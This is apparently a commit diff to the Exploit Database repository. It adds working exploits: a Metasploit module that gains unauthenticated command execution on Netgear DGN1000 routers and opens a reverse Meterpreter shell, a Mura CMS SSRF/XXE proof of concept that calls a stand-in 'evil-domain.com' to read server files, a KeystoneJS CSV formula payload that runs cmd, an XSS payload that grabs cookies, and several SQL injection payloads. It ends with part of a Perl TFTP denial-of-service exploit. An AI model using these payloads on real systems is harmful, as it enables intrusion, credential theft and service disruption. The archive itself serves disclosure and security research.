Cross-Site Scripting Vulnerabilities TEMENOS T24 - Cross-Site Scripting Multiple Vulnerabilities WebsitePanel - 'ReturnUrl' URI Redirection WebsitePanel - 'ReturnUrl' Open Redirection Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities Simple Machines 2.0.2 - HTML Injection Multiple Vulnerabilities ocPortal 7.1.5 - 'redirect' URI Redirection Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities ocPortal 7.1.5 - 'redirect' Open Redirection Scrutinizer 9.0.1.19899 - Cross-Site Scripting Multiple Vulnerabilities Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities Distimo Monitor - Cross-Site Scripting Multiple Vulnerabilities Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities Total Shop UK eCommerce CodeIgniter - Cross-Site Scripting Multiple Vulnerabilities Monstra - Multiple HTML Injection Vulnerabilities Monstra - HTML Injection Multiple Vulnerabilities Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities Power-eCommerce - Cross-Site Scripting Multiple Vulnerabilities Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities LibGuides - Multiple Cross-Site Scripting Vulnerabilities Web Wiz Forums - Cross-Site Scripting Multiple Vulnerabilities LibGuides - Cross-Site Scripting Multiple Vulnerabilities Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities Phorum 5.2.18 - Cross-Site Scripting Multiple Vulnerabilities PrestaShop 1.4.7 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Slideshow - Cross-Site Scripting Multiple Vulnerabilities Silverstripe CMS 2.4.x - 'BackURL' URI Redirection Silverstripe CMS 2.4.x - 'BackURL' Open Redirection AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities AxisInternet VoIP Manager - Cross-Site Scripting Multiple Vulnerabilities WordPress Theme Purity - Multiple Cross-Site Scripting Vulnerabilities WordPress Theme Purity - Cross-Site Scripting Multiple Vulnerabilities Switchvox - Multiple HTML Injection Vulnerabilities Switchvox - HTML Injection Multiple Vulnerabilities WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Akismet - Cross-Site Scripting Multiple Vulnerabilities WANem - Multiple Cross-Site Scripting Vulnerabilities WANem - Cross-Site Scripting Multiple Vulnerabilities NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities NetCat CMS - Cross-Site Scripting Multiple Vulnerabilities BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities BloofoxCMS 0.3.5 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities WordPress Plugin Contact Form Generator 2.0.1 - Cross-Site Request Forgery Multiple Vulnerabilities Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities Smartphone Pentest Framework - Remote Command Execution Multiple Vulnerabilities Joomla! Component com_incapsula - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component com_incapsula - Cross-Site Scripting Multiple Vulnerabilities Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities Openfire 3.10.2 - Cross-Site Scripting Multiple Vulnerabilities Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities Perforce P4Web - Cross-Site Scripting Multiple Vulnerabilities Sonar - Multiple Cross-Site Scripting Vulnerabilities Sonar - Cross-Site Scripting Multiple Vulnerabilities MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities MIMEsweeper For SMTP - Cross-Site Scripting Multiple Vulnerabilities phpMyRecipes - Multiple HTML Injection Vulnerabilities phpMyRecipes - HTML Injection Multiple Vulnerabilities OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities OrionDB Web Directory - Cross-Site Scripting Multiple Vulnerabilities PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities PHP Server Monitor 3.1.1 - Cross-Site Request Forgery Multiple Vulnerabilities Elastix - Multiple Cross-Site Scripting Vulnerabilities Elastix - Cross-Site Scripting Multiple Vulnerabilities Telaen 2.7.x - Open redirection Telaen 2.7.x - Open Redirection Xaraya - Multiple Cross-Site Scripting Vulnerabilities Xaraya - Cross-Site Scripting Multiple Vulnerabilities Mintboard - Multiple Cross-Site Scripting Vulnerabilities Mintboard - Cross-Site Scripting Multiple Vulnerabilities NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities NXFilter 3.0.3 - Cross-Site Scripting Multiple Vulnerabilities PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities PrestaShop - Cross-Site Request Forgery Multiple Vulnerabilities Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities Magnolia CMS - Cross-Site Scripting Multiple Vulnerabilities Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities Alienvault Open Source SIEM (OSSIM) - Cross-Site Scripting Multiple Vulnerabilities appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities appRain CMF - Cross-Site Request Forgery Multiple Vulnerabilities WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities WordPress Plugin Event Easy Calendar - Cross-Site Request Forgery Multiple Vulnerabilities Silverstripe CMS - Multiple HTML Injection Vulnerabilities Silverstripe CMS - HTML Injection Multiple Vulnerabilities OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities OpenMRS 2.3 (1.11.4) - Cross-Site Scripting Multiple Vulnerabilities OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities OpenX 2.8.x - Cross-Site Request Forgery Multiple Vulnerabilities ZamFoo - Multiple Remote Command Execution Vulnerabilities ZamFoo - Remote Command Execution Multiple Vulnerabilities ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities ATutor 2.2 - Cross-Site Scripting Multiple Vulnerabilities ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities ProjectSend r582 - Cross-Site Scripting Multiple Vulnerabilities NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities NationBuilder - Persistent Cross-Site Scripting Multiple Vulnerabilities w2wiki - Multiple Cross-Site Scripting Vulnerabilities w2wiki - Cross-Site Scripting Multiple Vulnerabilities Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities Radiant CMS 1.1.3 - Persistent Cross-Site Scripting Multiple Vulnerabilities Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities Apache Archiva 1.3.9 - Cross-Site Request Forgery Multiple Vulnerabilities Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities Wowza Streaming Engine 4.5.0 - Cross-Site Scripting Multiple Vulnerabilities Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities Nagios Network Analyzer 2.2.1 - Cross-Site Request Forgery Multiple Vulnerabilities InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities InfraPower PPS-02-S Q213V1 - Cross-Site Scripting Multiple Vulnerabilities ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities ViMbAdmin 3.0.15 - Cross-Site Request Forgery Multiple Vulnerabilities PHPMyFAQ 2.9.8 - Cross-Site Scripting PHPMyFAQ 2.9.8 - Cross-Site Scripting (1) Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) phpMyFAQ 2.9.8 - Cross-Site Scripting phpMyFAQ 2.9.8 - Cross-Site Scripting (2) Kaltura < 13.1.0 - Remote Code Execution Kaltura < 13.2.0 - Remote Code Execution Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection FS Shutter Stock Clone - 'keywords' SQL Injection FS Thumbtack Clone - 'ser' SQL Injection FS Trademe Clone - 'id' SQL Injection FS Monster Clone - 'id' SQL Injection FS Care Clone - 'sitterService' SQL Injection FS Crowdfunding Script - 'id' SQL Injection FS Realtor Clone - 'id' SQL Injection KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting
This commit is contained in:
Offensive Security
parent
5bd93d7e45
commit
c9ca104d1d
13 changed files with 1199 additions and 673 deletions
57
platforms/cfm/webapps/43045.txt
Executable file
57
platforms/cfm/webapps/43045.txt
Executable file
|
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: Mura CMS before 6.2 SSRF + XXE
|
||||
# Date: 30-10-2017
|
||||
# Exploit Author: Anthony Cole
|
||||
# Vendor Homepage: http://www.getmura.com/
|
||||
# Version: before 6.2
|
||||
# Contact: http://twitter.com/acole76
|
||||
# Website: http://twitter.com/acole76
|
||||
# Tested on: Windows 2008 w/ Coldfusion 8
|
||||
# CVE: CVE-2017-15639
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
Any user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
vulnerable file is on github, line 50:
|
||||
https://github.com/blueriver/MuraCMS/blob/c8753ce80373eca302c6d9d8a02ff63a1d308991/tasks/feed/readRSS.cfm
|
||||
|
||||
http://www.target.tld/tasks/feed/readRSS.cfm?siteid=SITENAMEHERE&rssurl=http://evil-domain.com/file.xml&MAXRSSITEMS=500
|
||||
|
||||
Explanation of params
|
||||
siteid - The siteid can be obtained by viewing the html source code of the target home page and searching "siteid".
|
||||
rssurl - This is the URL you want Mura CMS to call out to.
|
||||
|
||||
To perform a XXE attack, you will need to stand up a web server: python -m SimpleHTTPServer 80
|
||||
|
||||
Then create a file:
|
||||
|
||||
<?xml version="1.0" ?>
|
||||
<!DOCTYPE rss [
|
||||
<!ENTITY send SYSTEM "file:///c:\Windows\System32\drivers\etc\hosts">
|
||||
]>
|
||||
|
||||
<rss version="2.0">
|
||||
<channel>
|
||||
<title>title</title>
|
||||
<link>link</link>
|
||||
<description>description</description>
|
||||
<generator>http://www.getmura.com</generator>
|
||||
<pubDate>Thu, 28 Sep 2018 11:55:19 -0700</pubDate>
|
||||
<language>en-us</language>
|
||||
<item>
|
||||
<title>Item title</title>
|
||||
<link>http://host/</link>
|
||||
<guid isPermaLink="false">00000000-0000-0000-0000000000000000</guid>
|
||||
<pubDate>Thu, 21 Sep 2018 00:00:01 -0700</pubDate>
|
||||
<description>&send;</description>
|
||||
</item>
|
||||
</channel>
|
||||
</rss>
|
||||
|
||||
3. Solution:
|
||||
|
||||
delete readRSS.cfm from the server.
|
||||
94
platforms/hardware/remote/43055.rb
Executable file
94
platforms/hardware/remote/43055.rb
Executable file
|
|
@ -0,0 +1,94 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated OS command execution vulneralbility
|
||||
in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
|
||||
DGN2000v1 models.
|
||||
},
|
||||
'Author' => [
|
||||
'Mumbai <https://github.com/realoriginal>', # module
|
||||
'Robort Palerie <roberto@greyhats.it>' # vuln discovery
|
||||
],
|
||||
'References' => [
|
||||
['EDB', '25978'],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 5 2013',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE,
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Privileged' => true,
|
||||
'Payload' => {
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Targets' => [[ 'Automatic', {} ]],
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/setup.cgi',
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res && res.headers['WWW-Authenticate']
|
||||
auth = res.headers['WWW-Authenticate']
|
||||
if auth =~ /DGN1000/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Connecting to target...")
|
||||
|
||||
unless check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Exploiting target ....")
|
||||
execute_cmdstager(
|
||||
:flavor => :wget,
|
||||
:linemax => 200,
|
||||
:concat_operator => " && "
|
||||
)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/setup.cgi',
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'next_file' => 'netgear.cfg',
|
||||
'todo' => 'syscmd',
|
||||
'cmd' => cmd.to_s,
|
||||
'curpath' => '/',
|
||||
'currentsetting.htm' => '1'
|
||||
}
|
||||
})
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
end
|
||||
49
platforms/nodejs/webapps/43053.txt
Executable file
49
platforms/nodejs/webapps/43053.txt
Executable file
|
|
@ -0,0 +1,49 @@
|
|||
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated CSV Injection
|
||||
# Vendor Homepage: http://keystonejs.com/
|
||||
# Exploit Author: Ishaq Mohammed
|
||||
# Contact: https://twitter.com/security_prince
|
||||
# Website: https://about.me/security-prince
|
||||
# Category: WEBAPPS
|
||||
# Platform: Node.js
|
||||
# CVE: CVE-2017-15879
|
||||
|
||||
Vendor Description:
|
||||
|
||||
KeystoneJS is a powerful Node.js content management system and web app
|
||||
framework built on express and mongoose. Keystone makes it easy to create
|
||||
sophisticated web sites and apps, and comes with a beautiful auto-generated
|
||||
Admin UI.
|
||||
Source: https://github.com/keystonejs/keystone/blob/master/README.md
|
||||
|
||||
Technical Details and Exploitation:
|
||||
|
||||
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
|
||||
admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS
|
||||
before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
|
||||
|
||||
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15879
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
1.Go to Contact Us page and insert the below payload in the Name Field.
|
||||
Payload: @SUM(1+1)*cmd|' /C calc'!A0
|
||||
2. Login as Admin
|
||||
3. Now Navigate to Enquiries page and check the entered payload.
|
||||
4. Download as .csv, once done open it in excel and observe that calculator
|
||||
application gets open.
|
||||
|
||||
|
||||
Solution:
|
||||
|
||||
The issues have been fixed and the vendor has released the patches
|
||||
https://github.com/keystonejs/keystone/pull/4478/commits/1b791d55839ebf434e104cc9936ccb8c29019231
|
||||
|
||||
Reference:
|
||||
|
||||
https://github.com/keystonejs/keystone/pull/4478
|
||||
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
|
||||
|
||||
--
|
||||
Best Regards,
|
||||
Ishaq Mohammed
|
||||
https://about.me/security-prince
|
||||
46
platforms/nodejs/webapps/43054.txt
Executable file
46
platforms/nodejs/webapps/43054.txt
Executable file
|
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated Stored XSS
|
||||
# Vendor Homepage: http://keystonejs.com/
|
||||
# Exploit Author: Ishaq Mohammed
|
||||
# Contact: https://twitter.com/security_prince
|
||||
# Website: https://about.me/security-prince
|
||||
# Category: WEBAPPS
|
||||
# Platform: Node.js
|
||||
# CVE: CVE-2017-15878
|
||||
|
||||
Vendor Description:
|
||||
|
||||
KeystoneJS is a powerful Node.js content management system and web app
|
||||
framework built on express and mongoose. Keystone makes it easy to create
|
||||
sophisticated web sites and apps, and comes with a beautiful auto-generated
|
||||
Admin UI.
|
||||
Source: https://github.com/keystonejs/keystone/blob/master/README.md
|
||||
|
||||
Technical Details and Exploitation:
|
||||
|
||||
A cross-site scripting (XSS) vulnerability exists in
|
||||
fields/types/markdown/MarkdownType.js in KeystoneJS before 4.0.0-beta.7 via
|
||||
the Contact Us feature.
|
||||
|
||||
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15878
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
1. Navigate to Contact Us page
|
||||
2. Fill in the details needed and enter the below payload in message field
|
||||
and send
|
||||
<a onmouseover=alert(document.cookie)>XSS link</a>
|
||||
3. Now login as admin and navigate to the above new record created in the
|
||||
enquiries
|
||||
4. Move the cursor on the text “XSS link”
|
||||
|
||||
Solution:
|
||||
|
||||
The issues have been fixed and the vendor has released the patches
|
||||
|
||||
https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996f8a4aa35baa6b2bac
|
||||
|
||||
Reference:
|
||||
|
||||
https://github.com/keystonejs/keystone/pull/4478
|
||||
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
|
||||
|
||||
41
platforms/php/webapps/43046.txt
Executable file
41
platforms/php/webapps/43046.txt
Executable file
|
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: FS Shutter Stock Clone - 'keywords' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/shutterstock-clone/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
This is a versatile script to help you to launch a stock photo like Shutterstock.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [keywords] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/Category/
|
||||
|
||||
Parameter: keywords (POST)
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||||
Payload: keywords=SEARCH' AND (SELECT 2673 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(2673=2673,1))),0x71767a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UqZI'='UqZI&category=3
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 9 columns
|
||||
Payload: keywords=SEARCH' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706b71,0x6251747761714a75646f44454749674748584975524b6c59687576456c68696761764659764a6954,0x71767a6b71)-- HXrZ&category=3
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
37
platforms/php/webapps/43047.txt
Executable file
37
platforms/php/webapps/43047.txt
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: FS Thumbtack Clone - 'ser' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/thumbtack-clone/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Marketplace Script is a popular software solution helping you launch a marketplace website within minutes.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [ser] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/service-provider.php?ser=9631
|
||||
|
||||
Parameter: ser (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: ser=9631' AND 8601=8601 AND 'ZarH'='ZarH
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
37
platforms/php/webapps/43048.txt
Executable file
37
platforms/php/webapps/43048.txt
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: FS Trademe Clone - 'id' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/trademe-clone/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
This is possibly the only software solution to facilitate launching of a portal with features like auction, eCommerce, B2B, Real Estate, Job Portal and classifieds all in one similar to Trademe.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [id] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/property_details.php?id=12 AND 3616=3616
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: id=12 AND 3616=3616
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
37
platforms/php/webapps/43049.txt
Executable file
37
platforms/php/webapps/43049.txt
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: FS Monster Clone - 'id' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/monster-clone/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
A highly sought after W3 compliant web solution standing out tall with a host of exciting features packed in.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [id] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/Job_Details.php?id=6 AND 9364=9364
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: id=6 AND 9364=9364
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
37
platforms/php/webapps/43050.txt
Executable file
37
platforms/php/webapps/43050.txt
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: FS Care Clone - 'sitterService' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/care-clone/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
This product brings the most ideal solution to launch a portal dealing with every aspect of hiring care in a hasslefree manner.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [sitterService] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/searchJob.php?sitterService=1' AND 2728=2728 AND 'fhir'='fhir
|
||||
|
||||
Parameter: sitterService (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: sitterService=1' AND 2728=2728 AND 'fhir'='fhir
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
37
platforms/php/webapps/43051.txt
Executable file
37
platforms/php/webapps/43051.txt
Executable file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: FS Crowdfunding Script - 'id' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/crowdfunding-script/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Fortune Crowdfunding Script is a popular crowdfunding script developed in jQuery, PHP and MySQL.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [id] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/page_running_projects_details.php?id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
41
platforms/php/webapps/43052.txt
Executable file
41
platforms/php/webapps/43052.txt
Executable file
|
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: FS Realtor Clone - 'id' SQL Injection
|
||||
# Date: 2017-10-24
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: https://fortunescripts.com/
|
||||
# Software Link: https://fortunescripts.com/product/realtor-clone/
|
||||
# Version: 24 October 17
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-10-24
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The realtor business anywhere is dependent essentially on the support provided by a robust digital platform offering diverse solutions at fingertips.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [id] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
https://localhost/[path]/property_detail.php?id=29 AND 4599=4599
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: id=29 AND 4599=4599
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: id=29 AND SLEEP(5)
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
||||
|
|
@ -1,8 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/6043/info
|
||||
|
||||
A problem in SolarWinds TFTP Server may result in a denial of service, and may have other ramifications. SolarWinds TFTP Server is distributed for the Microsoft Windows platform.
|
||||
|
||||
Under some circumstances, it may be possible to crash a vulnerable TFTP server. By sending a UDP packet to the server that is 8193 or more bytes, the server becomes unstable. It has been reported that doing this can consistently reproduce a crash of the server, requiring a manual restart to resume normal operation.
|
||||
#source: http://www.securityfocus.com/bid/6043/info
|
||||
#
|
||||
#A problem in SolarWinds TFTP Server may result in a denial of service, and may have other ramifications. SolarWinds TFTP Server is distributed for the Microsoft Windows platform.
|
||||
#
|
||||
#Under some circumstances, it may be possible to crash a vulnerable TFTP server. By sending a UDP packet to the server that is 8193 or more bytes, the server becomes unstable. It has been reported that doing this can consistently reproduce a crash of the server, requiring a manual restart to resume normal operation.
|
||||
#
|
||||
#
|
||||
|
||||
#!/usr/bin/perl
|
||||
#TFTP Server remote DoS exploit by D4rkGr3y
|
||||
|
|
|
|||
